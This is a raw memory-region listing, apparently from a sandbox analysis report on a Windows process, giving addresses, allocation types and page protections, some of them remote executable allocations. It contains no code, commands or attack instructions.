1DDAEA17000
heap
page read and write
1381008E000
trusted library allocation
page read and write
20411761000
heap
page read and write
2BAAE5A5000
unkown
page read and write
1E084F2E000
heap
page read and write
1F2EF7A000
stack
page read and write
2BAAB96A000
unkown
page read and write
28728CFF000
heap
page read and write
26A871D0000
heap
page read and write
287293BF000
heap
page read and write
1DDAEA25000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
71BE000
unkown
page read and write
1DDAE9EE000
heap
page read and write
76E0000
unkown
page read and write
C7E9BFE000
unkown
page readonly
2BAAA067000
unkown
page read and write
684C7FF000
stack
page read and write
7FF52D1F6000
unkown
page readonly
7FFD9B8C0000
trusted library allocation
page read and write
287293AC000
heap
page read and write
138703DE000
heap
page read and write
7680000
unkown
page read and write
5AF8000
unkown
page read and write
8B3835F000
stack
page read and write
13801060000
trusted library allocation
page read and write
21A1F696000
heap
page read and write
2041177A000
heap
page read and write
D01A8D4000
unkown
page read and write
1386DFF0000
heap
page read and write
225DBFC1000
unkown
page readonly
2041120E000
heap
page read and write
4B5F000
unkown
page read and write
2BAAC7C0000
unkown
page read and write
2BAA9472000
unkown
page read and write
138001BA000
trusted library allocation
page read and write
27618E52000
heap
page read and write
27618E3E000
heap
page read and write
2BAAC55B000
unkown
page read and write
2BAADD60000
unkown
page readonly
13870690000
heap
page read and write
2BAA94FC000
unkown
page read and write
3F99F7F000
stack
page read and write
225DC692000
unkown
page readonly
721257E000
stack
page read and write
20410EB0000
heap
page read and write
26A871F1000
unkown
page readonly
1F2EFFD000
stack
page read and write
7FF581347000
unkown
page readonly
27B06C2D000
unkown
page read and write
2BAAE398000
unkown
page read and write
21A20221000
unkown
page read and write
26A88448000
heap
page read and write
20410F9D000
heap
page read and write
202C0379000
unkown
page read and write
13870162000
heap
page read and write
2BAAAD3D000
unkown
page read and write
7FFD9BA09000
trusted library allocation
page read and write
21A20221000
unkown
page read and write
FC84F7B000
stack
page read and write
20410F8E000
heap
page read and write
7FF581432000
unkown
page readonly
1E084F3F000
heap
page read and write
2BAAC56A000
unkown
page read and write
7FF5133F2000
unkown
page readonly
1F2F2BF000
stack
page read and write
26A87E47000
heap
page read and write
7FF581342000
unkown
page readonly
2AB7000
stack
page read and write
1DDAE9E8000
heap
page read and write
D01BC4E000
stack
page read and write
7FF513182000
unkown
page readonly
A925A7B000
unkown
page read and write
24D9FF71000
direct allocation
page execute read
225DBF60000
unkown
page read and write
258002DE000
unkown
page read and write
1DDAEA0C000
heap
page read and write
2BAAC574000
unkown
page read and write
2BAB0656000
unkown
page read and write
8C9A7FF000
stack
page read and write
2BAAE3D2000
unkown
page read and write
1DDAF1D9000
heap
page read and write
2BAAD6F0000
unkown
page readonly
1E084FF0000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
20410F42000
heap
page read and write
C5F68FE000
unkown
page readonly
1F2F4BB000
stack
page read and write
202C0400000
unkown
page read and write
20412FF1000
heap
page read and write
1DDAEA1D000
heap
page read and write
202C045D000
unkown
page read and write
E2BF2FE000
unkown
page readonly
7FF513521000
unkown
page readonly
A92664F000
stack
page read and write
C5F6EFC000
stack
page read and write
7FF5A9542000
unkown
page readonly
2BAA9558000
unkown
page read and write
27B07A0B000
unkown
page read and write
2BAAC7E4000
unkown
page read and write
2BAAC576000
unkown
page read and write
13870441000
heap
page read and write
20410F86000
heap
page read and write
202C02FE000
unkown
page read and write
225DC610000
unkown
page execute and read and write
2A660A02000
unkown
page read and write
7FF581491000
unkown
page readonly
26A87E3F000
heap
page read and write
6F3F000
unkown
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
26A88451000
heap
page read and write
20410F99000
heap
page read and write
27B06C43000
unkown
page read and write
2D0D49E4000
heap
page read and write
26A89CD4000
heap
page read and write
2BAAE8E5000
unkown
page read and write
2295CD61000
unkown
page readonly
1387044D000
heap
page read and write
7FF581274000
unkown
page readonly
202C048B000
unkown
page read and write
7FF52CBD1000
unkown
page readonly
7FF5A945A000
unkown
page readonly
4D0A000
unkown
page read and write
21A20221000
unkown
page read and write
7FF4BDDC0000
trusted library allocation
page execute and read and write
1F2F137000
stack
page read and write
1F2FF8C000
stack
page read and write
276188BD000
heap
page read and write
1DDAEA25000
heap
page read and write
26A89E20000
heap
page read and write
26A87990000
unkown
page execute and read and write
2BAAE64D000
unkown
page read and write
13801038000
trusted library allocation
page read and write
C19D5FF000
stack
page read and write
8B38A7B000
unkown
page read and write
7FFD9B930000
trusted library allocation
page read and write
2BAA7CB5000
heap
page read and write
21A20221000
unkown
page read and write
4CAFFC000
stack
page read and write
3F99FFF000
stack
page read and write
2BAADD50000
unkown
page readonly
D01ADFD000
unkown
page read and write
21A20221000
unkown
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
2A660715000
unkown
page read and write
26A87970000
unkown
page readonly
13870172000
heap
page read and write
6B026FE000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
24D9FD4C000
heap
page read and write
7DF486AA1000
unkown
page execute read
C7E93FE000
unkown
page readonly
741E000
unkown
page read and write
2BAAD5CB000
unkown
page read and write
1E08546A000
heap
page read and write
1E0855E2000
heap
page read and write
21A1F69A000
heap
page read and write
A9251E8000
unkown
page read and write
30D5000
unkown
page execute and read and write
20410F91000
heap
page read and write
1DDAECDE000
heap
page read and write
1DDAF1D7000
heap
page read and write
2BAAE57C000
unkown
page read and write
21A1F698000
heap
page read and write
13800DD8000
trusted library allocation
page read and write
C5F6FFE000
unkown
page readonly
26A87E07000
heap
page read and write
2BAAD0D0000
unkown
page readonly
2BAAE58F000
unkown
page read and write
7FF5A951B000
unkown
page readonly
1DDAEA40000
heap
page read and write
7FF5A9511000
unkown
page readonly
BC0907E000
unkown
page readonly
7FF581326000
unkown
page readonly
20411782000
heap
page read and write
8C9ADFB000
stack
page read and write
2BAACA23000
unkown
page read and write
76B0000
unkown
page read and write
7FF581270000
unkown
page readonly
493F000
unkown
page read and write
2BAAE837000
unkown
page read and write
7FFD9B897000
trusted library allocation
page read and write
28728CB3000
heap
page read and write
2BAAD6E0000
unkown
page readonly
26A88451000
heap
page read and write
2D0D4940000
heap
page read and write
28728F10000
heap
page read and write
EDEC5FE000
stack
page read and write
7760000
unkown
page execute and read and write
20410FA3000
heap
page read and write
EDEC57F000
stack
page read and write
1DDAEA12000
heap
page read and write
1E0855E5000
heap
page read and write
7700000
unkown
page read and write
1E084F7B000
heap
page read and write
2041120A000
heap
page read and write
2BAADF20000
unkown
page read and write
276188EA000
heap
page read and write
2041175E000
heap
page read and write
26A8841A000
heap
page read and write
1386E078000
heap
page read and write
20410FA4000
heap
page read and write
2BAAE5B7000
unkown
page read and write
138703B3000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
20410F93000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
7DF4F6290000
trusted library allocation
page execute and read and write
21A1F6A5000
heap
page read and write
26A87E59000
heap
page read and write
1E0855B7000
heap
page read and write
7FF582C40000
unkown
page readonly
276188B1000
heap
page read and write
27618E4C000
heap
page read and write
4A91000
unkown
page read and write
1E084F50000
heap
page read and write
20410F99000
heap
page read and write
7FF52D110000
unkown
page readonly
2BAAD120000
unkown
page read and write
208442D0000
remote allocation
page execute and read and write
1C8DBE40000
heap
page read and write
20410FC1000
heap
page read and write
276188F9000
heap
page read and write
26A8725A000
unkown
page read and write
7FFD9BA10000
trusted library allocation
page read and write
2F6B000
heap
page read and write
1C8DBF25000
heap
page read and write
1DDAF1F9000
heap
page read and write
1380007E000
trusted library allocation
page read and write
26A88448000
heap
page read and write
26A87D5B000
heap
page read and write
7FFD9B86A000
trusted library allocation
page read and write
1C8DBC69000
unkown
page readonly
28728E50000
trusted library allocation
page read and write
26A87E47000
heap
page read and write
7FF52D1F0000
unkown
page readonly
2BAAA4FA000
unkown
page read and write
26A87E50000
heap
page read and write
276188F1000
heap
page read and write
3F9A07F000
stack
page read and write
276188D0000
heap
page read and write
7FF58117B000
unkown
page readonly
7FFD9BAA0000
trusted library allocation
page read and write
2BAB05E6000
unkown
page read and write
225DCACE000
unkown
page read and write
27618891000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
1DDAEA39000
heap
page read and write
7730000
unkown
page read and write
138702D0000
heap
page read and write
7FF512411000
unkown
page readonly
225DBFF0000
heap
page read and write
684C77F000
stack
page read and write
2BAAE8DF000
unkown
page read and write
28728CEE000
heap
page read and write
75EA2FE000
stack
page read and write
26A87202000
unkown
page read and write
2BAAC750000
unkown
page readonly
2BAAAD29000
unkown
page read and write
2872ACC1000
heap
page read and write
138019E4000
trusted library allocation
page read and write
7FF58136C000
unkown
page readonly
2BAAAD19000
unkown
page read and write
2BAB1BA1000
unkown
page readonly
2530EA20000
heap
page read and write
1F2EDFE000
stack
page read and write
202C03A8000
unkown
page read and write
1E084EF0000
heap
page read and write
D01AEF6000
unkown
page read and write
1E084F41000
heap
page read and write
2BAAA07A000
unkown
page read and write
2BAAAC0C000
unkown
page read and write
21A20221000
unkown
page read and write
202BFC00000
unkown
page read and write
225DBEF0000
unkown
page readonly
225DC640000
remote allocation
page execute and read and write
17953802000
unkown
page read and write
21A20221000
unkown
page read and write
2BAAD376000
unkown
page read and write
26A874D0000
unkown
page readonly
4D86000
unkown
page read and write
1E085030000
trusted library allocation
page read and write
C5F67FC000
stack
page read and write
1DDAEB80000
heap
page read and write
BC095F9000
stack
page read and write
F25AE7E000
stack
page read and write
20411100000
trusted library allocation
page read and write
7FF512402000
unkown
page readonly
2D0D50B0000
trusted library allocation
page read and write
7FF58139E000
unkown
page readonly
21A20221000
unkown
page read and write
2BAACB6E000
unkown
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
7FF550526000
unkown
page readonly
7DF486AC1000
unkown
page execute read
4C7FFE000
stack
page read and write
21A1F698000
heap
page read and write
2A660613000
unkown
page read and write
26A87E4C000
heap
page read and write
4B64000
unkown
page read and write
2295D602000
unkown
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
13800C61000
trusted library allocation
page read and write
28728CBF000
heap
page read and write
13870247000
heap
page read and write
1E0855BE000
heap
page read and write
2BAA7C10000
unkown
page write copy
7FF52D146000
unkown
page readonly
7FF513430000
unkown
page readonly
2BAAC927000
unkown
page read and write
202BFBB0000
unkown
page read and write
276187B5000
heap
page read and write
7212AFE000
unkown
page readonly
27B001B6000
unkown
page read and write
17952F70000
unkown
page readonly
7FF5814D0000
unkown
page readonly
1DDB0A7E000
heap
page read and write
2BAAA400000
unkown
page readonly
2BAA9500000
unkown
page read and write
28728CE5000
heap
page read and write
26A87A15000
unkown
page read and write
7FF58144D000
unkown
page readonly
2BAADF10000
unkown
page read and write
21A1F6A3000
heap
page read and write
F25A5FE000
stack
page read and write
2BAAD720000
unkown
page read and write
2A660B02000
unkown
page read and write
7FF582A85000
unkown
page readonly
7FF52D172000
unkown
page readonly
C19D578000
stack
page read and write
2DCA000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
7FF582BCF000
unkown
page readonly
276188C3000
heap
page read and write
1E0855D9000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
21A20221000
unkown
page read and write
2D0D4A2F000
heap
page read and write
28728CEB000
heap
page read and write
1E084F91000
heap
page read and write
204112C0000
heap
page read and write
1DDAF1ED000
heap
page read and write
27618E69000
heap
page read and write
2BAAC56E000
unkown
page read and write
2BAAD1B0000
unkown
page readonly
7FF513556000
unkown
page readonly
1E084F4A000
heap
page read and write
7FF512462000
unkown
page readonly
2BAAA078000
unkown
page read and write
7FF513437000
unkown
page readonly
2BAAD66E000
unkown
page read and write
1CC91450000
remote allocation
page execute and read and write
21A1F6AD000
heap
page read and write
1E085467000
heap
page read and write
7FF582B0B000
unkown
page readonly
7FF582C46000
unkown
page readonly
2F0F000
heap
page read and write
2BAAAD41000
unkown
page read and write
1386E1F0000
heap
page read and write
2BAAAB51000
unkown
page read and write
7FF513588000
unkown
page readonly
2FA0000
heap
page read and write
2295CE13000
unkown
page read and write
4A00000
unkown
page execute and read and write
2BAAD180000
unkown
page readonly
2BAA9460000
unkown
page read and write
1386E020000
heap
page read and write
28728C95000
heap
page read and write
21A1F6A3000
heap
page read and write
26A87E59000
heap
page read and write
225DCB45000
unkown
page read and write
7FF5124A6000
unkown
page readonly
20411779000
heap
page read and write
1DDAED4B000
heap
page read and write
C7E98FE000
stack
page read and write
7FF550486000
unkown
page readonly
7FFDE21F0000
direct allocation
page execute read
2A66065D000
unkown
page read and write
27618E69000
heap
page read and write
2BAAE5B1000
unkown
page read and write
1C8DDAE0000
heap
page read and write
276188FA000
heap
page read and write
76F0000
unkown
page read and write
2BAAA65F000
unkown
page read and write
27B08A0B000
unkown
page read and write
2FE8000
unkown
page read and write
21A20221000
unkown
page read and write
2BAAC7B0000
unkown
page read and write
276188C7000
heap
page read and write
26A87E7D000
heap
page read and write
26A87E7D000
heap
page read and write
2BAAE5B5000
unkown
page read and write
7FF581369000
unkown
page readonly
1DDAEBA0000
trusted library allocation
page read and write
75EA3FF000
stack
page read and write
2D0D4980000
heap
page read and write
A9264CB000
unkown
page read and write
27B0534A000
unkown
page read and write
2D0D537B000
trusted library allocation
page read and write
C5F71FE000
unkown
page readonly
1E084F56000
heap
page read and write
2BAAC551000
unkown
page read and write
225DC053000
unkown
page read and write
1380184E000
trusted library allocation
page read and write
2BAAD370000
unkown
page read and write
2872ACC2000
heap
page read and write
17953013000
unkown
page read and write
21A20221000
unkown
page read and write
7FF582B1A000
unkown
page readonly
8B38CFE000
unkown
page readonly
7FF512438000
unkown
page readonly
22D860F0000
heap
page read and write
2DC0000
heap
page read and write
2BAAC710000
heap
page read and write
24D9FF99000
direct allocation
page readonly
2041120A000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
7FF513594000
unkown
page readonly
2BAA9509000
unkown
page read and write
7FF52D119000
unkown
page readonly
7FFD9B6B2000
trusted library allocation
page read and write
24D9FEB0000
unkown
page readonly
1E084F7F000
heap
page read and write
21A20221000
unkown
page read and write
28728EBB000
heap
page read and write
7FF582B66000
unkown
page readonly
A92597A000
unkown
page read and write
1C8DBBFE000
unkown
page readonly
26A89CCD000
heap
page read and write
1DDAF1F9000
heap
page read and write
1E084F67000
heap
page read and write
1E084F4C000
heap
page read and write
1380161F000
trusted library allocation
page read and write
7710000
unkown
page read and write
1DDB0A84000
heap
page read and write
7FF581474000
unkown
page readonly
202BFC81000
unkown
page read and write
2BAAA054000
unkown
page read and write
7DF486A71000
unkown
page execute read
2A6608E1000
unkown
page readonly
7FFD9B7D0000
trusted library allocation
page execute and read and write
261C3DC0000
unkown
page execute and read and write
17952FF0000
heap
page read and write
7FF5504C6000
unkown
page readonly
1386F9E0000
heap
page read and write
7FF550491000
unkown
page readonly
1DDAEA08000
heap
page read and write
2295CF00000
unkown
page read and write
26A87E43000
heap
page read and write
20411779000
heap
page read and write
2BAA9464000
unkown
page read and write
1DDAEA20000
heap
page read and write
7FF582BA2000
unkown
page readonly
1E0855DA000
heap
page read and write
23ED962C000
heap
page read and write
C5F6BFE000
unkown
page readonly
21A20221000
unkown
page read and write
4C93FD000
stack
page read and write
1DDAECDE000
heap
page read and write
1DDAE9F3000
heap
page read and write
2530EAC0000
heap
page read and write
2BAAD150000
unkown
page readonly
1E0855D9000
heap
page read and write
276187E0000
trusted library allocation
page read and write
700B000
unkown
page read and write
1E0855E9000
heap
page read and write
C5F657F000
stack
page read and write
7FF5814C9000
unkown
page readonly
24D9FF33000
heap
page read and write
26A89CCD000
heap
page read and write
1386FBD0000
trusted library allocation
page read and write
1E084F4E000
heap
page read and write
2BAAACDD000
unkown
page read and write
225DCB4A000
unkown
page read and write
1386E0B8000
heap
page read and write
2BAAC51B000
unkown
page read and write
7FF5A9518000
unkown
page readonly
2BAAAB05000
unkown
page read and write
26A88448000
heap
page read and write
21A20221000
unkown
page read and write
21A20221000
unkown
page read and write
1DDAECDA000
heap
page read and write
8B385F1000
unkown
page read and write
1E086E5D000
heap
page read and write
7FF581314000
unkown
page readonly
2BAA94F8000
unkown
page read and write
2295D530000
remote allocation
page execute and read and write
23ED94C0000
heap
page read and write
138701EF000
heap
page read and write
26A87E64000
heap
page read and write
28728CB3000
heap
page read and write
21A1F6A3000
heap
page read and write
7FF5504BB000
unkown
page readonly
26A87E74000
heap
page read and write
2BAAC564000
unkown
page read and write
2BAACB83000
unkown
page read and write
26A87E43000
heap
page read and write
24D9FFE0000
heap
page read and write
2872ACD4000
heap
page read and write
FC843DA000
stack
page read and write
F25AFFB000
stack
page read and write
27618E3A000
heap
page read and write
2D0D5072000
trusted library allocation
page read and write
21A20221000
unkown
page read and write
C7E92FE000
stack
page read and write
202C0AB0000
unkown
page execute and read and write
27B06BE6000
unkown
page read and write
21A20221000
unkown
page read and write
A9265CB000
stack
page read and write
1387023B000
heap
page read and write
2BAB04E0000
unkown
page read and write
1386E072000
heap
page read and write
27618E58000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
27B0052E000
unkown
page read and write
276188EB000
heap
page read and write
7DF486AC0000
unkown
page readonly
287293C9000
heap
page read and write
2A660679000
unkown
page read and write
26A87990000
remote allocation
page execute and read and write
276188EF000
heap
page read and write
7FF5812A9000
unkown
page readonly
20410F6B000
heap
page read and write
20410F89000
heap
page read and write
26A88410000
heap
page read and write
D01B17E000
unkown
page read and write
21A20221000
unkown
page read and write
7FF581359000
unkown
page readonly
7FF52D128000
unkown
page readonly
4C83FF000
stack
page read and write
26A87861000
unkown
page readonly
7FF581468000
unkown
page readonly
6E70000
heap
page execute and read and write
D01ACFF000
unkown
page read and write
7FF51352E000
unkown
page readonly
20410EC0000
heap
page read and write
759E000
unkown
page read and write
20411202000
heap
page read and write
7FFD9B6CB000
trusted library allocation
page read and write
1DDAEA1A000
heap
page read and write
21A20221000
unkown
page read and write
1DDAE9E5000
heap
page read and write
2BAAE612000
unkown
page read and write
7212CFE000
unkown
page readonly
7FF52D121000
unkown
page readonly
13801AFE000
trusted library allocation
page read and write
26A87E26000
heap
page read and write
13800AEA000
trusted library allocation
page read and write
7FF5135B2000
unkown
page readonly
28728C30000
heap
page read and write
20410FA2000
heap
page read and write
2BAA7C70000
heap
page read and write
3112000
heap
page read and write
7FF52D11B000
unkown
page readonly
7FF58146D000
unkown
page readonly
204112C5000
heap
page read and write
202C0B11000
unkown
page execute read
7DF486A00000
unkown
page readonly
7FF52D142000
unkown
page readonly
2BAA9551000
unkown
page read and write
1381017D000
trusted library allocation
page read and write
2BAAD333000
unkown
page read and write
24D9FC40000
heap
page read and write
1E4E9F25000
heap
page read and write
20410F89000
heap
page read and write
138701F7000
heap
page read and write
1DDAF1FB000
heap
page read and write
2BAAE8E3000
unkown
page read and write
7FFD9B796000
trusted library allocation
page execute and read and write
20410FA1000
heap
page read and write
2BAAE63F000
unkown
page read and write
21A1F6A3000
heap
page read and write
2BAAC530000
unkown
page read and write
2BAAC4F0000
unkown
page read and write
7FF5A944E000
unkown
page readonly
1E084F91000
heap
page read and write
17953770000
remote allocation
page execute and read and write
17953002000
unkown
page read and write
24D9FFA1000
direct allocation
page execute read
276188BD000
heap
page read and write
1E084F91000
heap
page read and write
2872ACC0000
heap
page read and write
2BAAC619000
unkown
page read and write
1E086E51000
heap
page read and write
1DDAEA50000
heap
page read and write
27B06C41000
unkown
page read and write
28728CBF000
heap
page read and write
2BAA953E000
unkown
page read and write
24D9FC30000
unkown
page readonly
138016FC000
trusted library allocation
page read and write
202BFB40000
unkown
page read and write
7FF581281000
unkown
page readonly
138703B7000
heap
page read and write
225DBF30000
unkown
page readonly
1386FB20000
trusted library allocation
page read and write
21A20190000
direct allocation
page execute and read and write
2D0D58A0000
trusted library allocation
page read and write
1DDAF1DF000
heap
page read and write
A9254FE000
unkown
page read and write
2CD0000
heap
page read and write
7DF486A10000
unkown
page readonly
7FF52D138000
unkown
page readonly
20410FCD000
heap
page read and write
258001B5000
unkown
page read and write
28728C77000
heap
page read and write
1E084F62000
heap
page read and write
4C8FFC000
stack
page read and write
21A20221000
unkown
page read and write
2BAAC59B000
unkown
page read and write
2872ACC5000
heap
page read and write
7FF5A9526000
unkown
page readonly
FC84878000
stack
page read and write
2BAAD6A0000
unkown
page readonly
24DA1B9C000
unkown
page read and write
26A89CC0000
heap
page read and write
1C8DC040000
heap
page execute and read and write
22D8611B000
heap
page read and write
21A20221000
unkown
page read and write
21A20221000
unkown
page read and write
202C042A000
unkown
page read and write
287293C9000
heap
page read and write
2BAAD550000
unkown
page readonly
7FF5812B3000
unkown
page readonly
7FF5123E8000
unkown
page readonly
21A20221000
unkown
page read and write
7FF58139B000
unkown
page readonly
1DDAF1FD000
heap
page read and write
28728CBD000
heap
page read and write
7750000
unkown
page read and write
26A87E24000
heap
page read and write
202C0502000
unkown
page read and write
2BAAC6EE000
unkown
page read and write
27618E54000
heap
page read and write
28728EB7000
heap
page read and write
1DDAF1DC000
heap
page read and write
2FBB000
heap
page read and write
1DDAEA50000
heap
page read and write
2BAAC6D6000
unkown
page read and write
21A20221000
unkown
page read and write
7DF486A41000
unkown
page execute read
13801120000
trusted library allocation
page read and write
21A1F6A3000
heap
page read and write
7FF52C959000
unkown
page readonly
E2BE6FE000
unkown
page readonly
204112CD000
heap
page read and write
1DDAECDA000
heap
page read and write
2BAADDA0000
unkown
page readonly
EADEAFF000
stack
page read and write
202C0473000
unkown
page read and write
21A20221000
unkown
page read and write
D01A8CE000
unkown
page read and write
1C8DB03B000
unkown
page readonly
2BAAC58B000
unkown
page read and write
20411784000
heap
page read and write
7FF550520000
unkown
page readonly
202BFC13000
unkown
page read and write
FC84DFE000
stack
page read and write
21A20190000
direct allocation
page execute and read and write
1DDAE9FF000
heap
page read and write
26A87300000
unkown
page read and write
28728CC8000
heap
page read and write
21A20221000
unkown
page read and write
721287E000
stack
page read and write
22D86110000
heap
page read and write
2A660A24000
unkown
page read and write
4B4E000
unkown
page read and write
7212B79000
stack
page read and write
C7E9AFE000
unkown
page readonly
2BAAED60000
unkown
page readonly
26A89CCD000
heap
page read and write
2BAAE5D8000
unkown
page read and write
2BAA9D60000
unkown
page readonly
2BAACAA8000
unkown
page read and write
2BAAE5A3000
unkown
page read and write
225DC671000
unkown
page execute read
20410FCC000
heap
page read and write
20411763000
heap
page read and write
2A6608F1000
unkown
page readonly
21A20221000
unkown
page read and write
1386FA00000
heap
page read and write
28728CC2000
heap
page read and write
2BAA7C00000
unkown
page read and write
27618894000
heap
page read and write
276188D2000
heap
page read and write
7FF52D16D000
unkown
page readonly
D01B0FE000
unkown
page read and write
F25AC7C000
stack
page read and write
1381009F000
trusted library allocation
page read and write
22D86300000
heap
page read and write
13801B10000
trusted library allocation
page read and write
26A87E33000
heap
page read and write
7FF5A94E6000
unkown
page readonly
2295D530000
unkown
page execute and read and write
2BAACB34000
unkown
page read and write
2BAAF230000
remote allocation
page execute and read and write
202C0AE0000
remote allocation
page execute and read and write
F25ACF9000
stack
page read and write
1DDAEA3A000
heap
page read and write
26A87D5E000
heap
page read and write
202C0AB0000
unkown
page execute and read and write
2A660643000
unkown
page read and write
26A87D55000
heap
page read and write
28728CC2000
heap
page read and write
28728C95000
heap
page read and write
21A1F6A3000
heap
page read and write
7FF580EB1000
unkown
page readonly
2BAAC524000
unkown
page read and write
28728CBA000
heap
page read and write
2A660600000
unkown
page read and write
276188C0000
heap
page read and write
7FF52D152000
unkown
page readonly
20410F78000
heap
page read and write
2BAAC57C000
unkown
page read and write
21A1F6A3000
heap
page read and write
2BAAC52D000
unkown
page read and write
1DDAEA39000
heap
page read and write
71FB000
unkown
page read and write
1E0855C3000
heap
page read and write
2BAA9468000
unkown
page read and write
7FF5A94DD000
unkown
page readonly
2BAA7B1F000
heap
page read and write
202C030A000
unkown
page read and write
29C0000
heap
page read and write
2BAAD4B0000
unkown
page read and write
13800A58000
trusted library allocation
page read and write
7FF512406000
unkown
page readonly
2295CD30000
unkown
page readonly
6F40000
unkown
page write copy
2BAAC730000
unkown
page readonly
287293A0000
heap
page read and write
7DF486AB1000
unkown
page execute read
27B00001000
unkown
page read and write
23ED9905000
heap
page read and write
1E0855B0000
heap
page read and write
21A20221000
unkown
page read and write
24D9FF40000
remote allocation
page execute and read and write
1F2F43E000
stack
page read and write
1C8DBEF0000
heap
page read and write
1E084F26000
heap
page read and write
26A87E7D000
heap
page read and write
20411789000
heap
page read and write
13801657000
trusted library allocation
page read and write
25310500000
heap
page read and write
2BAA94FE000
unkown
page read and write
1E0855D0000
heap
page read and write
26A8844D000
heap
page read and write
2BAAE140000
unkown
page read and write
23ED9720000
heap
page read and write
20410FA3000
heap
page read and write
21A20221000
unkown
page read and write
7DF486A70000
unkown
page readonly
1DDAF203000
heap
page read and write
7FF581439000
unkown
page readonly
6B02CFD000
stack
page read and write
24D9FF00000
unkown
page readonly
21A20221000
unkown
page read and write
7FF582B56000
unkown
page readonly
2BAAF1A0000
unkown
page execute and read and write
2D0D50F0000
heap
page execute and read and write
7FF582BA9000
unkown
page readonly
2BAAE59D000
unkown
page read and write
27618E69000
heap
page read and write
27B0760B000
unkown
page read and write
7FFD9B7E0000
trusted library allocation
page execute and read and write
26A88428000
heap
page read and write
1E084F91000
heap
page read and write
27618E35000
heap
page read and write
27B06C3B000
unkown
page read and write
276188D5000
heap
page read and write
A9253FF000
unkown
page read and write
2BAACB85000
unkown
page read and write
20412FFD000
heap
page read and write
EADEC7E000
stack
page read and write
28728E50000
trusted library allocation
page read and write
27618810000
heap
page read and write
F25AAFF000
stack
page read and write
20410F38000
heap
page read and write
1E084F7F000
heap
page read and write
2EA3000
unkown
page execute and read and write
276188B3000
heap
page read and write
7211F09000
stack
page read and write
20411100000
trusted library allocation
page read and write
27618E6D000
heap
page read and write
7FF582B0E000
unkown
page readonly
2D0D5140000
heap
page read and write
1DDB0A72000
heap
page read and write
1F2F33E000
stack
page read and write
2BAAE5C8000
unkown
page read and write
202C021E000
unkown
page read and write
2BAA7A71000
unkown
page readonly
1DDAEA05000
heap
page read and write
6B0236A000
stack
page read and write
26A88459000
heap
page read and write
276188CF000
heap
page read and write
2530E9FD000
heap
page read and write
7FF5812D2000
unkown
page readonly
20410F86000
heap
page read and write
1E084F48000
heap
page read and write
2B10000
unkown
page readonly
7FF582B52000
unkown
page readonly
26A87E8B000
heap
page read and write
FC849FB000
stack
page read and write
2BAAD520000
unkown
page readonly
202BFC4E000
unkown
page read and write
D01B07E000
unkown
page read and write
7FFD9B6BD000
trusted library allocation
page execute and read and write
8C9ACFE000
stack
page read and write
7FF5135F0000
unkown
page readonly
27B0192E000
unkown
page read and write
A925272000
stack
page read and write
21A20221000
unkown
page read and write
4A10000
unkown
page read and write
7FF56971B000
unkown
page readonly
BC094FE000
stack
page read and write
2BAB2FB1000
unkown
page execute read
7FF5A94E2000
unkown
page readonly
24DA1BD0000
unkown
page readonly
2EB0000
unkown
page read and write
13870433000
heap
page read and write
13801837000
trusted library allocation
page read and write
26A87E51000
heap
page read and write
7FF5A9486000
unkown
page readonly
2D01000
unkown
page read and write
261C3DC0000
remote allocation
page execute and read and write
1DDAEA3E000
heap
page read and write
225DCB2D000
unkown
page read and write
28728EBA000
heap
page read and write
7FFD9B892000
trusted library allocation
page read and write
26A87E4E000
heap
page read and write
21A20221000
unkown
page read and write
2041120A000
heap
page read and write
2BAACAB8000
unkown
page read and write
1386E0B2000
heap
page read and write
26A8843B000
heap
page read and write
8170000
unkown
page read and write
2BAAE40B000
unkown
page read and write
202C0991000
unkown
page readonly
1E0855D0000
heap
page read and write
20412FFD000
heap
page read and write
8C9A11A000
stack
page read and write
6B027FE000
stack
page read and write
7DF486AD1000
unkown
page execute read
7FF52D156000
unkown
page readonly
7FF5135C7000
unkown
page readonly
1E086E54000
heap
page read and write
1DDAF1DC000
heap
page read and write
1E084F7C000
heap
page read and write
1DDAECD3000
heap
page read and write
27618E72000
heap
page read and write
C5F70FC000
stack
page read and write
7DF486A50000
unkown
page readonly
2BAAC5F1000
unkown
page read and write
6B02EFE000
stack
page read and write
2BAAE5A9000
unkown
page read and write
27618E4C000
heap
page read and write
2D0D4BD0000
heap
page read and write
6ED517E000
stack
page read and write
20410FA4000
heap
page read and write
26A87E28000
heap
page read and write
1E084F7B000
heap
page read and write
2BAAEB98000
unkown
page read and write
EADEA7F000
stack
page read and write
20410FA3000
heap
page read and write
7FFD9B850000
trusted library allocation
page read and write
2BAAE5EF000
unkown
page read and write
2BAACB7D000
unkown
page read and write
1386FBC0000
heap
page read and write
202C043D000
unkown
page read and write
20411762000
heap
page read and write
2530E990000
heap
page read and write
1E086E64000
heap
page read and write
2BAADDB0000
unkown
page readonly
D01BB7E000
unkown
page read and write
13801640000
trusted library allocation
page read and write
2761A6E5000
heap
page read and write
1DDAEA1E000
heap
page read and write
2BAAB966000
unkown
page read and write
30D2000
unkown
page read and write
26A8841E000
heap
page read and write
2BAAE340000
unkown
page read and write
1E4E9F54000
heap
page read and write
7FF581367000
unkown
page readonly
225DC012000
heap
page read and write
2BAAC62A000
unkown
page read and write
7FF5813E6000
unkown
page readonly
1E084F66000
heap
page read and write
7FFD9B6C0000
trusted library allocation
page read and write
26A87E52000
heap
page read and write
276188EF000
heap
page read and write
202C0279000
unkown
page read and write
26A87E43000
heap
page read and write
202C0249000
unkown
page read and write
28728CA1000
heap
page read and write
2295CE2A000
unkown
page read and write
202C0500000
unkown
page read and write
2D0D5070000
trusted library allocation
page read and write
138010F7000
trusted library allocation
page read and write
2D0D4A88000
heap
page read and write
20411768000
heap
page read and write
28728CC2000
heap
page read and write
20411785000
heap
page read and write
25800EFB000
unkown
page read and write
17953102000
unkown
page read and write
24D9FE80000
unkown
page read and write
1E084F59000
heap
page read and write
26A8841A000
heap
page read and write
27618E3A000
heap
